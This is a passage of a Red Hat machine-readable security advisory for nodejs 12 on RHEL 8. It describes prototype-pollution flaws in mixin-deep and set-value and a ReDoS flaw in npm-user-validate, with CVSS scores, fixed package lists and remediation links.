"AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-mixin-deep: prototype pollution in function mixin-deep" }, { "cve": "CVE-2019-10747", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2019-08-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1795479" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-set-value. The function mixin-deep can be tricked into adding or modifying properties of Object.prototype using any of the constructor, prototype, or _proto_ payloads. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-set-value: prototype pollution in function set-value", "title": "Vulnerability summary" }, { "category": "other", "text": "While OpenShift Container Platform (OCP) contains the affected nodejs-set-value code, it\u0027s added as a dependency of Kibana 5. Similar issue about prototype pollution [1] have been fixed, but no known attack vector was found, so we\u0027re rating this issue as Low for OCP. \n\nIn Red Hat Software Collections and Red Hat Enterprise Linux 8, nodejs-set-value is bundled into nodejs-nodemon, and is not meant to be accessed outside of that package. Within nodemon, this flaw is rated with a Low severity.\n\nOpenShift distributed tracing bundles vulnerable version of Nodejs set-value package, however the components are protected by OpenShift OAuth, hence the impact by this vulnerability is reduced to LOW.\n\n[1] CVE-2019-10744 https://www.elastic.co/community/security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-10747" }, { "category": "external", "summary": "RHBZ#1795479", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795479" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-10747", "url": "https://www.cve.org/CVERecord?id=CVE-2019-10747" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-10747", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10747" } ], "release_date": "2019-06-20T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:52+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0549" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-set-value: prototype pollution in function set-value" }, { "cve": "CVE-2020-7754", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-10-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1892430" } ], "notes": [ { "category": "description", "text": "This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Enterprise Linux 8 and Software Collections, `npm-user-validate` is used exclusively for `npm`. As a result, this vulnerability is considered Low in such a context.\n\nIn OpenShift Container Platform (OCP) 3.11 and 4.4 the kibana package has been marked Low (similar to RHEL8) as it is primarily used for npm and is protected via OpenShift OAuth. Additionally, whilst OCP 4.4 does deliver the kibana package, due to the code changing to container first content, it has been marked as wontfix at this time and may be fixed in a future release. \n\nAdditionally, the openshift4/ose-logging-kibana6 container is not represented on the CVE page as it gets npm from the Red Hat Software Collections and as such the ose-logging-kibana6 container will be updated when the rh-nodejs10-nodejs package is.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7754" }, { "category": "external", "summary": "RHBZ#1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7754", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7754" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754" }, { "category": "external", "summary": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p", "url": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p" } ], "release_date": "2020-10-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:52+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", 